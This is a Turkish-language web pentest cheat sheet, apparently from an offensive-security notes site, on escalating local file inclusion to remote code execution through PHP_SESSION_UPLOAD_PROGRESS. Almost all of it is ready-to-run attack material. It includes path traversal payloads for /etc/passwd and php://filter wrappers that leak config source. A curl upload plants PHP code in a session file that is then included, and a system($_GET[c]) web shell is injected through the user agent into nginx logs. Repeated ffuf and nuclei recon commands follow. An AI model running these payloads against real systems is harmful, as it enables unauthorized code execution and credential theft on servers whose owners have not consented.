Skip to content

LFI2RCE via PHP_SESSION_UPLOAD_PROGRESS

web lfi

LFI2RCE via PHP_SESSION_UPLOAD_PROGRESS dosya okuma/include yüzeyinden config sızıntısı ve LFI→RCE zincirlerine odaklanır. Wrapper, tmp ve log zehirleme yolları birlikte ele alınır.

  1. Traversal ve wrapper (php://filter) ile dosya oku.

  2. Log/session/tmp zehirleme yüzeyi bul.

  3. LFI→RCE zincirini (filter/phar/tmp) dene.

  4. Config/credential sızıntısını paketle.

....//....//....//etc/passwd
..%2f..%2f..%2fetc/passwd
/etc/passwd%00
Terminal window
ffuf -u 'https://TARGET/page?file=FUZZ' -w /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt -mr 'root:'
Terminal window
curl -sk 'https://TARGET/page?file=../../../../etc/passwd'
php://filter/convert.base64-encode/resource=index.php
php://filter/read=string.rot13/resource=config.php
Terminal window
curl -sk 'https://TARGET/page?file=php://filter/convert.base64-encode/resource=../config.php' | base64 -d
Terminal window
curl -sk -F 'PHP_SESSION_UPLOAD_PROGRESS=<?php system("id");?>' -F 'file=@big.bin' -b 'PHPSESSID=attacker' https://TARGET/upload
Terminal window
curl -sk 'https://TARGET/page?file=/var/lib/php/sessions/sess_attacker'
Terminal window
curl -sk 'https://TARGET/' -A '<?php system($_GET[c]);?>'
Terminal window
curl -sk 'https://TARGET/page?file=/var/log/nginx/access.log&c=id'
/proc/self/environ, /var/log/auth.log, sess_* hedefleri

LFI2RCE via PHP_SESSION_UPLOAD_PROGRESS sonuçları hedef sürüme ve yığına göre değişir. Her başarılı adımı request/response ile kaydet; sonraki pivot’u not et.

Terminal window
curl -sk https://TARGET/robots.txt
Terminal window
nuclei -u https://TARGET -as -silent
Terminal window
ffuf -u https://TARGET/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt -mc 200,204,301,302,403
GET / HTTP/1.1
Host: TARGET
Accept: */*
Terminal window
mkdir -p evidence/web && tee evidence/web/notes.txt

Bu ekler keşif ve kanıt paketini hızlandırır; asıl sömürü üstteki bölümlerdeki konu-özel payload’larla yapılır.

Terminal window
curl -sk https://TARGET/robots.txt
Terminal window
curl -sk https://TARGET/sitemap.xml
Terminal window
ffuf -u https://TARGET/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt -mc 200,204,301,302,403
Terminal window
nuclei -u https://TARGET -as -silent
GET / HTTP/1.1
Host: TARGET
Accept: */*
Terminal window
mkdir -p evidence/web && tee evidence/web/notes.txt
request/response
zaman damgası
kullanılan hesap
etki özeti
Terminal window
curl -sk https://TARGET/ -D evidence/web/headers.txt -o evidence/web/body.html